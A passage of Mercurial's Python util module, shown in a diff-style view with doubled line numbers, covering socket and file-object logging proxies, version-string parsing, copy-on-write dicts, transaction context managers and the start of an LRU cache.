745 # Call a method on the observer of the same name with arguments
743 # Call a method on the observer of the same name with arguments
746 # so it can react, log, etc.
744 # so it can react, log, etc.
747 observer = object.__getattribute__(self, r'_observer')
745 observer = object.__getattribute__(self, r'_observer')
748 fn = getattr(observer, name, None)
746 fn = getattr(observer, name, None)
749 if fn:
747 if fn:
750 fn(res, *args, **kwargs)
748 fn(res, *args, **kwargs)
751
749
752 return res
750 return res
753
751
754 def makefile(self, *args, **kwargs):
752 def makefile(self, *args, **kwargs):
755 res = object.__getattribute__(self, r'_observedcall')(
753 res = object.__getattribute__(self, r'_observedcall')(
756 r'makefile', *args, **kwargs)
754 r'makefile', *args, **kwargs)
757
755
758 # The file object may be used for I/O. So we turn it into a
756 # The file object may be used for I/O. So we turn it into a
759 # proxy using our observer.
757 # proxy using our observer.
760 observer = object.__getattribute__(self, r'_observer')
758 observer = object.__getattribute__(self, r'_observer')
761 return makeloggingfileobject(observer.fh, res, observer.name,
759 return makeloggingfileobject(observer.fh, res, observer.name,
762 reads=observer.reads,
760 reads=observer.reads,
763 writes=observer.writes,
761 writes=observer.writes,
764 logdata=observer.logdata,
762 logdata=observer.logdata,
765 logdataapis=observer.logdataapis)
763 logdataapis=observer.logdataapis)
766
764
767 def recv(self, *args, **kwargs):
765 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
766 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
767 r'recv', *args, **kwargs)
770
768
771 def recvfrom(self, *args, **kwargs):
769 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
770 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
771 r'recvfrom', *args, **kwargs)
774
772
775 def recvfrom_into(self, *args, **kwargs):
773 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
774 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
775 r'recvfrom_into', *args, **kwargs)
778
776
779 def recv_into(self, *args, **kwargs):
777 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
778 return object.__getattribute__(self, r'_observedcall')(
781 r'recv_info', *args, **kwargs)
779 r'recv_info', *args, **kwargs)
782
780
783 def send(self, *args, **kwargs):
781 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
782 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
783 r'send', *args, **kwargs)
786
784
787 def sendall(self, *args, **kwargs):
785 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
786 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
787 r'sendall', *args, **kwargs)
790
788
791 def sendto(self, *args, **kwargs):
789 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
790 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
791 r'sendto', *args, **kwargs)
794
792
795 def setblocking(self, *args, **kwargs):
793 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
794 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
795 r'setblocking', *args, **kwargs)
798
796
799 def settimeout(self, *args, **kwargs):
797 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
798 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
799 r'settimeout', *args, **kwargs)
802
800
803 def gettimeout(self, *args, **kwargs):
801 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
802 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
803 r'gettimeout', *args, **kwargs)
806
804
807 def setsockopt(self, *args, **kwargs):
805 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
806 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
807 r'setsockopt', *args, **kwargs)
810
808
811 class baseproxyobserver(object):
809 class baseproxyobserver(object):
812 def _writedata(self, data):
810 def _writedata(self, data):
813 if not self.logdata:
811 if not self.logdata:
814 if self.logdataapis:
812 if self.logdataapis:
815 self.fh.write('\n')
813 self.fh.write('\n')
816 self.fh.flush()
814 self.fh.flush()
817 return
815 return
818
816
819 # Simple case writes all data on a single line.
817 # Simple case writes all data on a single line.
820 if b'\n' not in data:
818 if b'\n' not in data:
821 if self.logdataapis:
819 if self.logdataapis:
822 self.fh.write(': %s\n' % stringutil.escapedata(data))
820 self.fh.write(': %s\n' % stringutil.escapedata(data))
823 else:
821 else:
824 self.fh.write('%s> %s\n'
822 self.fh.write('%s> %s\n'
825 % (self.name, stringutil.escapedata(data)))
823 % (self.name, stringutil.escapedata(data)))
826 self.fh.flush()
824 self.fh.flush()
827 return
825 return
828
826
829 # Data with newlines is written to multiple lines.
827 # Data with newlines is written to multiple lines.
830 if self.logdataapis:
828 if self.logdataapis:
831 self.fh.write(':\n')
829 self.fh.write(':\n')
832
830
833 lines = data.splitlines(True)
831 lines = data.splitlines(True)
834 for line in lines:
832 for line in lines:
835 self.fh.write('%s> %s\n'
833 self.fh.write('%s> %s\n'
836 % (self.name, stringutil.escapedata(line)))
834 % (self.name, stringutil.escapedata(line)))
837 self.fh.flush()
835 self.fh.flush()
838
836
839 class fileobjectobserver(baseproxyobserver):
837 class fileobjectobserver(baseproxyobserver):
840 """Logs file object activity."""
838 """Logs file object activity."""
841 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
839 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
842 logdataapis=True):
840 logdataapis=True):
843 self.fh = fh
841 self.fh = fh
844 self.name = name
842 self.name = name
845 self.logdata = logdata
843 self.logdata = logdata
846 self.logdataapis = logdataapis
844 self.logdataapis = logdataapis
847 self.reads = reads
845 self.reads = reads
848 self.writes = writes
846 self.writes = writes
849
847
850 def read(self, res, size=-1):
848 def read(self, res, size=-1):
851 if not self.reads:
849 if not self.reads:
852 return
850 return
853 # Python 3 can return None from reads at EOF instead of empty strings.
851 # Python 3 can return None from reads at EOF instead of empty strings.
854 if res is None:
852 if res is None:
855 res = ''
853 res = ''
856
854
857 if self.logdataapis:
855 if self.logdataapis:
858 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
856 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
859
857
860 self._writedata(res)
858 self._writedata(res)
861
859
862 def readline(self, res, limit=-1):
860 def readline(self, res, limit=-1):
863 if not self.reads:
861 if not self.reads:
864 return
862 return
865
863
866 if self.logdataapis:
864 if self.logdataapis:
867 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
865 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
868
866
869 self._writedata(res)
867 self._writedata(res)
870
868
871 def readinto(self, res, dest):
869 def readinto(self, res, dest):
872 if not self.reads:
870 if not self.reads:
873 return
871 return
874
872
875 if self.logdataapis:
873 if self.logdataapis:
876 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
874 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
877 res))
875 res))
878
876
879 data = dest[0:res] if res is not None else b''
877 data = dest[0:res] if res is not None else b''
880 self._writedata(data)
878 self._writedata(data)
881
879
882 def write(self, res, data):
880 def write(self, res, data):
883 if not self.writes:
881 if not self.writes:
884 return
882 return
885
883
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
884 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 # returns the integer bytes written.
885 # returns the integer bytes written.
888 if res is None and data:
886 if res is None and data:
889 res = len(data)
887 res = len(data)
890
888
891 if self.logdataapis:
889 if self.logdataapis:
892 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
890 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
893
891
894 self._writedata(data)
892 self._writedata(data)
895
893
896 def flush(self, res):
894 def flush(self, res):
897 if not self.writes:
895 if not self.writes:
898 return
896 return
899
897
900 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
898 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
901
899
902 # For observedbufferedinputpipe.
900 # For observedbufferedinputpipe.
903 def bufferedread(self, res, size):
901 def bufferedread(self, res, size):
904 if not self.reads:
902 if not self.reads:
905 return
903 return
906
904
907 if self.logdataapis:
905 if self.logdataapis:
908 self.fh.write('%s> bufferedread(%d) -> %d' % (
906 self.fh.write('%s> bufferedread(%d) -> %d' % (
909 self.name, size, len(res)))
907 self.name, size, len(res)))
910
908
911 self._writedata(res)
909 self._writedata(res)
912
910
913 def bufferedreadline(self, res):
911 def bufferedreadline(self, res):
914 if not self.reads:
912 if not self.reads:
915 return
913 return
916
914
917 if self.logdataapis:
915 if self.logdataapis:
918 self.fh.write('%s> bufferedreadline() -> %d' % (
916 self.fh.write('%s> bufferedreadline() -> %d' % (
919 self.name, len(res)))
917 self.name, len(res)))
920
918
921 self._writedata(res)
919 self._writedata(res)
922
920
923 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
921 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
924 logdata=False, logdataapis=True):
922 logdata=False, logdataapis=True):
925 """Turn a file object into a logging file object."""
923 """Turn a file object into a logging file object."""
926
924
927 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
925 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
928 logdata=logdata, logdataapis=logdataapis)
926 logdata=logdata, logdataapis=logdataapis)
929 return fileobjectproxy(fh, observer)
927 return fileobjectproxy(fh, observer)
930
928
931 class socketobserver(baseproxyobserver):
929 class socketobserver(baseproxyobserver):
932 """Logs socket activity."""
930 """Logs socket activity."""
933 def __init__(self, fh, name, reads=True, writes=True, states=True,
931 def __init__(self, fh, name, reads=True, writes=True, states=True,
934 logdata=False, logdataapis=True):
932 logdata=False, logdataapis=True):
935 self.fh = fh
933 self.fh = fh
936 self.name = name
934 self.name = name
937 self.reads = reads
935 self.reads = reads
938 self.writes = writes
936 self.writes = writes
939 self.states = states
937 self.states = states
940 self.logdata = logdata
938 self.logdata = logdata
941 self.logdataapis = logdataapis
939 self.logdataapis = logdataapis
942
940
943 def makefile(self, res, mode=None, bufsize=None):
941 def makefile(self, res, mode=None, bufsize=None):
944 if not self.states:
942 if not self.states:
945 return
943 return
946
944
947 self.fh.write('%s> makefile(%r, %r)\n' % (
945 self.fh.write('%s> makefile(%r, %r)\n' % (
948 self.name, mode, bufsize))
946 self.name, mode, bufsize))
949
947
950 def recv(self, res, size, flags=0):
948 def recv(self, res, size, flags=0):
951 if not self.reads:
949 if not self.reads:
952 return
950 return
953
951
954 if self.logdataapis:
952 if self.logdataapis:
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
953 self.fh.write('%s> recv(%d, %d) -> %d' % (
956 self.name, size, flags, len(res)))
954 self.name, size, flags, len(res)))
957 self._writedata(res)
955 self._writedata(res)
958
956
959 def recvfrom(self, res, size, flags=0):
957 def recvfrom(self, res, size, flags=0):
960 if not self.reads:
958 if not self.reads:
961 return
959 return
962
960
963 if self.logdataapis:
961 if self.logdataapis:
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
962 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
965 self.name, size, flags, len(res[0])))
963 self.name, size, flags, len(res[0])))
966
964
967 self._writedata(res[0])
965 self._writedata(res[0])
968
966
969 def recvfrom_into(self, res, buf, size, flags=0):
967 def recvfrom_into(self, res, buf, size, flags=0):
970 if not self.reads:
968 if not self.reads:
971 return
969 return
972
970
973 if self.logdataapis:
971 if self.logdataapis:
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
972 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
975 self.name, size, flags, res[0]))
973 self.name, size, flags, res[0]))
976
974
977 self._writedata(buf[0:res[0]])
975 self._writedata(buf[0:res[0]])
978
976
979 def recv_into(self, res, buf, size=0, flags=0):
977 def recv_into(self, res, buf, size=0, flags=0):
980 if not self.reads:
978 if not self.reads:
981 return
979 return
982
980
983 if self.logdataapis:
981 if self.logdataapis:
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
982 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
985 self.name, size, flags, res))
983 self.name, size, flags, res))
986
984
987 self._writedata(buf[0:res])
985 self._writedata(buf[0:res])
988
986
989 def send(self, res, data, flags=0):
987 def send(self, res, data, flags=0):
990 if not self.writes:
988 if not self.writes:
991 return
989 return
992
990
993 self.fh.write('%s> send(%d, %d) -> %d' % (
991 self.fh.write('%s> send(%d, %d) -> %d' % (
994 self.name, len(data), flags, len(res)))
992 self.name, len(data), flags, len(res)))
995 self._writedata(data)
993 self._writedata(data)
996
994
997 def sendall(self, res, data, flags=0):
995 def sendall(self, res, data, flags=0):
998 if not self.writes:
996 if not self.writes:
999 return
997 return
1000
998
1001 if self.logdataapis:
999 if self.logdataapis:
1002 # Returns None on success. So don't bother reporting return value.
1000 # Returns None on success. So don't bother reporting return value.
1003 self.fh.write('%s> sendall(%d, %d)' % (
1001 self.fh.write('%s> sendall(%d, %d)' % (
1004 self.name, len(data), flags))
1002 self.name, len(data), flags))
1005
1003
1006 self._writedata(data)
1004 self._writedata(data)
1007
1005
1008 def sendto(self, res, data, flagsoraddress, address=None):
1006 def sendto(self, res, data, flagsoraddress, address=None):
1009 if not self.writes:
1007 if not self.writes:
1010 return
1008 return
1011
1009
1012 if address:
1010 if address:
1013 flags = flagsoraddress
1011 flags = flagsoraddress
1014 else:
1012 else:
1015 flags = 0
1013 flags = 0
1016
1014
1017 if self.logdataapis:
1015 if self.logdataapis:
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1016 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1019 self.name, len(data), flags, address, res))
1017 self.name, len(data), flags, address, res))
1020
1018
1021 self._writedata(data)
1019 self._writedata(data)
1022
1020
1023 def setblocking(self, res, flag):
1021 def setblocking(self, res, flag):
1024 if not self.states:
1022 if not self.states:
1025 return
1023 return
1026
1024
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1025 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1028
1026
1029 def settimeout(self, res, value):
1027 def settimeout(self, res, value):
1030 if not self.states:
1028 if not self.states:
1031 return
1029 return
1032
1030
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1031 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1034
1032
1035 def gettimeout(self, res):
1033 def gettimeout(self, res):
1036 if not self.states:
1034 if not self.states:
1037 return
1035 return
1038
1036
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1037 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1040
1038
1041 def setsockopt(self, level, optname, value):
1039 def setsockopt(self, level, optname, value):
1042 if not self.states:
1040 if not self.states:
1043 return
1041 return
1044
1042
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1043 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1046 self.name, level, optname, value))
1044 self.name, level, optname, value))
1047
1045
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1046 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1049 logdata=False, logdataapis=True):
1047 logdata=False, logdataapis=True):
1050 """Turn a socket into a logging socket."""
1048 """Turn a socket into a logging socket."""
1051
1049
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1050 observer = socketobserver(logh, name, reads=reads, writes=writes,
1053 states=states, logdata=logdata,
1051 states=states, logdata=logdata,
1054 logdataapis=logdataapis)
1052 logdataapis=logdataapis)
1055 return socketproxy(fh, observer)
1053 return socketproxy(fh, observer)
1056
1054
1057 def version():
1055 def version():
1058 """Return version information if available."""
1056 """Return version information if available."""
1059 try:
1057 try:
1060 from . import __version__
1058 from . import __version__
1061 return __version__.version
1059 return __version__.version
1062 except ImportError:
1060 except ImportError:
1063 return 'unknown'
1061 return 'unknown'
1064
1062
1065 def versiontuple(v=None, n=4):
1063 def versiontuple(v=None, n=4):
1066 """Parses a Mercurial version string into an N-tuple.
1064 """Parses a Mercurial version string into an N-tuple.
1067
1065
1068 The version string to be parsed is specified with the ``v`` argument.
1066 The version string to be parsed is specified with the ``v`` argument.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1067 If it isn't defined, the current Mercurial version string will be parsed.
1070
1068
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1069 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1072 returned values:
1070 returned values:
1073
1071
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1072 >>> v = b'3.6.1+190-df9b73d2d444'
1075 >>> versiontuple(v, 2)
1073 >>> versiontuple(v, 2)
1076 (3, 6)
1074 (3, 6)
1077 >>> versiontuple(v, 3)
1075 >>> versiontuple(v, 3)
1078 (3, 6, 1)
1076 (3, 6, 1)
1079 >>> versiontuple(v, 4)
1077 >>> versiontuple(v, 4)
1080 (3, 6, 1, '190-df9b73d2d444')
1078 (3, 6, 1, '190-df9b73d2d444')
1081
1079
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1080 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1081 (3, 6, 1, '190-df9b73d2d444+20151118')
1084
1082
1085 >>> v = b'3.6'
1083 >>> v = b'3.6'
1086 >>> versiontuple(v, 2)
1084 >>> versiontuple(v, 2)
1087 (3, 6)
1085 (3, 6)
1088 >>> versiontuple(v, 3)
1086 >>> versiontuple(v, 3)
1089 (3, 6, None)
1087 (3, 6, None)
1090 >>> versiontuple(v, 4)
1088 >>> versiontuple(v, 4)
1091 (3, 6, None, None)
1089 (3, 6, None, None)
1092
1090
1093 >>> v = b'3.9-rc'
1091 >>> v = b'3.9-rc'
1094 >>> versiontuple(v, 2)
1092 >>> versiontuple(v, 2)
1095 (3, 9)
1093 (3, 9)
1096 >>> versiontuple(v, 3)
1094 >>> versiontuple(v, 3)
1097 (3, 9, None)
1095 (3, 9, None)
1098 >>> versiontuple(v, 4)
1096 >>> versiontuple(v, 4)
1099 (3, 9, None, 'rc')
1097 (3, 9, None, 'rc')
1100
1098
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1099 >>> v = b'3.9-rc+2-02a8fea4289b'
1102 >>> versiontuple(v, 2)
1100 >>> versiontuple(v, 2)
1103 (3, 9)
1101 (3, 9)
1104 >>> versiontuple(v, 3)
1102 >>> versiontuple(v, 3)
1105 (3, 9, None)
1103 (3, 9, None)
1106 >>> versiontuple(v, 4)
1104 >>> versiontuple(v, 4)
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1105 (3, 9, None, 'rc+2-02a8fea4289b')
1108 """
1106 """
1109 if not v:
1107 if not v:
1110 v = version()
1108 v = version()
1111 parts = remod.split('[\+-]', v, 1)
1109 parts = remod.split('[\+-]', v, 1)
1112 if len(parts) == 1:
1110 if len(parts) == 1:
1113 vparts, extra = parts[0], None
1111 vparts, extra = parts[0], None
1114 else:
1112 else:
1115 vparts, extra = parts
1113 vparts, extra = parts
1116
1114
1117 vints = []
1115 vints = []
1118 for i in vparts.split('.'):
1116 for i in vparts.split('.'):
1119 try:
1117 try:
1120 vints.append(int(i))
1118 vints.append(int(i))
1121 except ValueError:
1119 except ValueError:
1122 break
1120 break
1123 # (3, 6) -> (3, 6, None)
1121 # (3, 6) -> (3, 6, None)
1124 while len(vints) < 3:
1122 while len(vints) < 3:
1125 vints.append(None)
1123 vints.append(None)
1126
1124
1127 if n == 2:
1125 if n == 2:
1128 return (vints[0], vints[1])
1126 return (vints[0], vints[1])
1129 if n == 3:
1127 if n == 3:
1130 return (vints[0], vints[1], vints[2])
1128 return (vints[0], vints[1], vints[2])
1131 if n == 4:
1129 if n == 4:
1132 return (vints[0], vints[1], vints[2], extra)
1130 return (vints[0], vints[1], vints[2], extra)
1133
1131
1134 def cachefunc(func):
1132 def cachefunc(func):
1135 '''cache the result of function calls'''
1133 '''cache the result of function calls'''
1136 # XXX doesn't handle keywords args
1134 # XXX doesn't handle keywords args
1137 if func.__code__.co_argcount == 0:
1135 if func.__code__.co_argcount == 0:
1138 cache = []
1136 cache = []
1139 def f():
1137 def f():
1140 if len(cache) == 0:
1138 if len(cache) == 0:
1141 cache.append(func())
1139 cache.append(func())
1142 return cache[0]
1140 return cache[0]
1143 return f
1141 return f
1144 cache = {}
1142 cache = {}
1145 if func.__code__.co_argcount == 1:
1143 if func.__code__.co_argcount == 1:
1146 # we gain a small amount of time because
1144 # we gain a small amount of time because
1147 # we don't need to pack/unpack the list
1145 # we don't need to pack/unpack the list
1148 def f(arg):
1146 def f(arg):
1149 if arg not in cache:
1147 if arg not in cache:
1150 cache[arg] = func(arg)
1148 cache[arg] = func(arg)
1151 return cache[arg]
1149 return cache[arg]
1152 else:
1150 else:
1153 def f(*args):
1151 def f(*args):
1154 if args not in cache:
1152 if args not in cache:
1155 cache[args] = func(*args)
1153 cache[args] = func(*args)
1156 return cache[args]
1154 return cache[args]
1157
1155
1158 return f
1156 return f
1159
1157
1160 class cow(object):
1158 class cow(object):
1161 """helper class to make copy-on-write easier
1159 """helper class to make copy-on-write easier
1162
1160
1163 Call preparewrite before doing any writes.
1161 Call preparewrite before doing any writes.
1164 """
1162 """
1165
1163
1166 def preparewrite(self):
1164 def preparewrite(self):
1167 """call this before writes, return self or a copied new object"""
1165 """call this before writes, return self or a copied new object"""
1168 if getattr(self, '_copied', 0):
1166 if getattr(self, '_copied', 0):
1169 self._copied -= 1
1167 self._copied -= 1
1170 return self.__class__(self)
1168 return self.__class__(self)
1171 return self
1169 return self
1172
1170
1173 def copy(self):
1171 def copy(self):
1174 """always do a cheap copy"""
1172 """always do a cheap copy"""
1175 self._copied = getattr(self, '_copied', 0) + 1
1173 self._copied = getattr(self, '_copied', 0) + 1
1176 return self
1174 return self
1177
1175
1178 class sortdict(collections.OrderedDict):
1176 class sortdict(collections.OrderedDict):
1179 '''a simple sorted dictionary
1177 '''a simple sorted dictionary
1180
1178
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1179 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1182 >>> d2 = d1.copy()
1180 >>> d2 = d1.copy()
1183 >>> d2
1181 >>> d2
1184 sortdict([('a', 0), ('b', 1)])
1182 sortdict([('a', 0), ('b', 1)])
1185 >>> d2.update([(b'a', 2)])
1183 >>> d2.update([(b'a', 2)])
1186 >>> list(d2.keys()) # should still be in last-set order
1184 >>> list(d2.keys()) # should still be in last-set order
1187 ['b', 'a']
1185 ['b', 'a']
1188 '''
1186 '''
1189
1187
1190 def __setitem__(self, key, value):
1188 def __setitem__(self, key, value):
1191 if key in self:
1189 if key in self:
1192 del self[key]
1190 del self[key]
1193 super(sortdict, self).__setitem__(key, value)
1191 super(sortdict, self).__setitem__(key, value)
1194
1192
1195 if pycompat.ispypy:
1193 if pycompat.ispypy:
1196 # __setitem__() isn't called as of PyPy 5.8.0
1194 # __setitem__() isn't called as of PyPy 5.8.0
1197 def update(self, src):
1195 def update(self, src):
1198 if isinstance(src, dict):
1196 if isinstance(src, dict):
1199 src = src.iteritems()
1197 src = src.iteritems()
1200 for k, v in src:
1198 for k, v in src:
1201 self[k] = v
1199 self[k] = v
1202
1200
1203 class cowdict(cow, dict):
1201 class cowdict(cow, dict):
1204 """copy-on-write dict
1202 """copy-on-write dict
1205
1203
1206 Be sure to call d = d.preparewrite() before writing to d.
1204 Be sure to call d = d.preparewrite() before writing to d.
1207
1205
1208 >>> a = cowdict()
1206 >>> a = cowdict()
1209 >>> a is a.preparewrite()
1207 >>> a is a.preparewrite()
1210 True
1208 True
1211 >>> b = a.copy()
1209 >>> b = a.copy()
1212 >>> b is a
1210 >>> b is a
1213 True
1211 True
1214 >>> c = b.copy()
1212 >>> c = b.copy()
1215 >>> c is a
1213 >>> c is a
1216 True
1214 True
1217 >>> a = a.preparewrite()
1215 >>> a = a.preparewrite()
1218 >>> b is a
1216 >>> b is a
1219 False
1217 False
1220 >>> a is a.preparewrite()
1218 >>> a is a.preparewrite()
1221 True
1219 True
1222 >>> c = c.preparewrite()
1220 >>> c = c.preparewrite()
1223 >>> b is c
1221 >>> b is c
1224 False
1222 False
1225 >>> b is b.preparewrite()
1223 >>> b is b.preparewrite()
1226 True
1224 True
1227 """
1225 """
1228
1226
1229 class cowsortdict(cow, sortdict):
1227 class cowsortdict(cow, sortdict):
1230 """copy-on-write sortdict
1228 """copy-on-write sortdict
1231
1229
1232 Be sure to call d = d.preparewrite() before writing to d.
1230 Be sure to call d = d.preparewrite() before writing to d.
1233 """
1231 """
1234
1232
1235 class transactional(object):
1233 class transactional(object):
1236 """Base class for making a transactional type into a context manager."""
1234 """Base class for making a transactional type into a context manager."""
1237 __metaclass__ = abc.ABCMeta
1235 __metaclass__ = abc.ABCMeta
1238
1236
1239 @abc.abstractmethod
1237 @abc.abstractmethod
1240 def close(self):
1238 def close(self):
1241 """Successfully closes the transaction."""
1239 """Successfully closes the transaction."""
1242
1240
1243 @abc.abstractmethod
1241 @abc.abstractmethod
1244 def release(self):
1242 def release(self):
1245 """Marks the end of the transaction.
1243 """Marks the end of the transaction.
1246
1244
1247 If the transaction has not been closed, it will be aborted.
1245 If the transaction has not been closed, it will be aborted.
1248 """
1246 """
1249
1247
1250 def __enter__(self):
1248 def __enter__(self):
1251 return self
1249 return self
1252
1250
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1251 def __exit__(self, exc_type, exc_val, exc_tb):
1254 try:
1252 try:
1255 if exc_type is None:
1253 if exc_type is None:
1256 self.close()
1254 self.close()
1257 finally:
1255 finally:
1258 self.release()
1256 self.release()
1259
1257
1260 @contextlib.contextmanager
1258 @contextlib.contextmanager
1261 def acceptintervention(tr=None):
1259 def acceptintervention(tr=None):
1262 """A context manager that closes the transaction on InterventionRequired
1260 """A context manager that closes the transaction on InterventionRequired
1263
1261
1264 If no transaction was provided, this simply runs the body and returns
1262 If no transaction was provided, this simply runs the body and returns
1265 """
1263 """
1266 if not tr:
1264 if not tr:
1267 yield
1265 yield
1268 return
1266 return
1269 try:
1267 try:
1270 yield
1268 yield
1271 tr.close()
1269 tr.close()
1272 except error.InterventionRequired:
1270 except error.InterventionRequired:
1273 tr.close()
1271 tr.close()
1274 raise
1272 raise
1275 finally:
1273 finally:
1276 tr.release()
1274 tr.release()
1277
1275
1278 @contextlib.contextmanager
1276 @contextlib.contextmanager
1279 def nullcontextmanager():
1277 def nullcontextmanager():
1280 yield
1278 yield
1281
1279
1282 class _lrucachenode(object):
1280 class _lrucachenode(object):
1283 """A node in a doubly linked list.
1281 """A node in a doubly linked list.
1284
1282
1285 Holds a reference to nodes on either side as well as a key-value
1283 Holds a reference to nodes on either side as well as a key-value
1286 pair for the dictionary entry.
1284 pair for the dictionary entry.
1287 """
1285 """
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1286 __slots__ = (u'next', u'prev', u'key', u'value')
1289
1287
1290 def __init__(self):
1288 def __init__(self):
1291 self.next = None
1289 self.next = None
1292 self.prev = None
1290 self.prev = None
1293
1291
1294 self.key = _notset
1292 self.key = _notset
1295 self.value = None
1293 self.value = None
1296
1294
1297 def markempty(self):
1295 def markempty(self):
1298 """Mark the node as emptied."""
1296 """Mark the node as emptied."""
1299 self.key = _notset
1297 self.key = _notset
1300
1298
1301 class lrucachedict(object):
1299 class lrucachedict(object):
1302 """Dict that caches most recent accesses and sets.
1300 """Dict that caches most recent accesses and sets.
1303
1301
1304 The dict consists of an actual backing dict - indexed by original
1302 The dict consists of an actual backing dict - indexed by original
1305 key - and a doubly linked circular list defining the order of entries in
1303 key - and a doubly linked circular list defining the order of entries in
1306 the cache.
1304 the cache.
1307
1305
1308 The head node is the newest entry in the cache. If the cache is full,
1306 The head node is the newest entry in the cache. If the cache is full,
1309 we recycle head.prev and make it the new head. Cache accesses result in
1307 we recycle head.prev and make it the new head. Cache accesses result in
1310 the node being moved to before the existing head and being marked as the
1308 the node being moved to before the existing head and being marked as the
1311 new head node.
1309 new head node.
1312 """
1310 """
1313 def __init__(self, max):
1311 def __init__(self, max):
1314 self._cache = {}
1312 self._cache = {}
1315
1313
1316 self._head = head = _lrucachenode()
1314 self._head = head = _lrucachenode()
1317 head.prev = head
1315 head.prev = head
1318 head.next = head
1316 head.next = head
1319 self._size = 1
1317 self._size = 1
1320 self._capacity = max
1318 self._capacity = max
1321
1319
1322 def __len__(self):
1320 def __len__(self):
1323 return len(self._cache)
1321 return len(self._cache)
1324
1322
1325 def __contains__(self, k):
1323 def __contains__(self, k):
1326 return k in self._cache
1324 return k in self._cache
1327
1325
1328 def __iter__(self):
1326 def __iter__(self):
1329 # We don't have to iterate in cache order, but why not.
1327 # We don't have to iterate in cache order, but why not.
1330 n = self._head
1328 n = self._head
1331 for i in range(len(self._cache)):
1329 for i in range(len(self._cache)):
1332 yield n.key
1330 yield n.key
1333 n = n.next
1331 n = n.next
1334
1332
1335 def __getitem__(self, k):
1333 def __getitem__(self, k):
1336 node = self._cache[k]
1334 node = self._cache[k]
1337 self._movetohead(node)
1335 self._movetohead(node)
1338 return node.value
1336 return node.value
1339
1337
1340 def __setitem__(self, k, v):
1338 def __setitem__(self, k, v):
1341 node = self._cache.get(k)
1339 node = self._cache.get(k)
1342 # Replace existing value and mark as newest.
1340 # Replace existing value and mark as newest.
1343 if node is not None:
1341 if node is not None:
1344 node.value = v
1342 node.value = v
1345 self._movetohead(node)
1343 self._movetohead(node)
1346 return
1344 return
1347
1345
